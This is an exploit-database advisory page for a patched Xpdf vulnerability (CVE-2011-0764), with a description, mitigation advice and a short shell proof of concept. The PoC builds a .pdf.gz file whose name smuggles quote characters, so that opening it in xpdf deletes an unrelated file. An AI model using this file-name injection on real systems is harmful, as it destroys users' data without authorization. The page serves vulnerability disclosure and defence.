header-logo
Suggest Exploit
vendor:
Xpdf
by:
Unknown
5.5
CVSS
MEDIUM
Security Bypass
264
CWE
Product Name: Xpdf
Affected Version From: Unknown
Affected Version To: Unknown
Patch Exists: YES
Related CWE: CVE-2011-0764
CPE: a:glyph_and_cog:xpdf
Metasploit: https://www.rapid7.com/db/vulnerabilities/centos_linux-cve-2011-0764/https://www.rapid7.com/db/vulnerabilities/centos_linux-cve-2011-1552/https://www.rapid7.com/db/vulnerabilities/centos_linux-cve-2011-1553/https://www.rapid7.com/db/vulnerabilities/centos_linux-cve-2011-1554/https://www.rapid7.com/db/vulnerabilities/suse-cve-2011-1552/https://www.rapid7.com/db/vulnerabilities/suse-cve-2011-1553/https://www.rapid7.com/db/vulnerabilities/suse-cve-2011-1554/https://www.rapid7.com/db/vulnerabilities/gentoo-linux-cve-2011-0764/https://www.rapid7.com/db/vulnerabilities/gentoo-linux-cve-2011-1552/https://www.rapid7.com/db/vulnerabilities/gentoo-linux-cve-2011-1553/https://www.rapid7.com/db/vulnerabilities/gentoo-linux-cve-2011-1554/https://www.rapid7.com/db/vulnerabilities/suse-cve-2011-0764/https://www.rapid7.com/db/vulnerabilities/linuxrpm-RHSA-2012-0137/https://www.rapid7.com/db/vulnerabilities/linuxrpm-RHSA-2012-0062/https://www.rapid7.com/db/vulnerabilities/linuxrpm-RHSA-2012-1201/
Other Scripts:
Platforms Tested: Linux, Unix
2011

Xpdf Security Bypass Vulnerability

Attackers can exploit a vulnerability in Xpdf to bypass security restrictions and perform unauthorized actions. This may aid in launching further attacks. By creating a specially crafted PDF file and viewing it using Xpdf, attackers can delete files on the system without proper authorization.

Mitigation:

Apply the latest patches or updates from the vendor to address this vulnerability. Avoid opening PDF files from untrusted sources.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/49007/info

Xpdf is prone to a security-bypass vulnerability that may allow attackers to perform actions without proper authorization.

Attackers can exploit this issue to bypass security restrictions and perform unauthorized actions; this may aid in launching further attacks. 

$ touch y # The unrelated victim file
$ gzip -c </dev/null >'" y ".pdf.gz' # Create a .pdf.gz file
$ xpdf '" y ".pdf.gz' # View it using xpdf
Error: May not be a PDF file (continuing anyway)
Error: PDF file is damaged - attempting to reconstruct xref table...
Error: Couldn't find trailer dictionary
Error: Couldn't read xref table
rm: cannot remove `/tmp/': Is a directory
$ ls -l y # The victim file is gone!
ls: cannot access y: No such file or directory

Navigation

Suggest Exploit

Services By CQR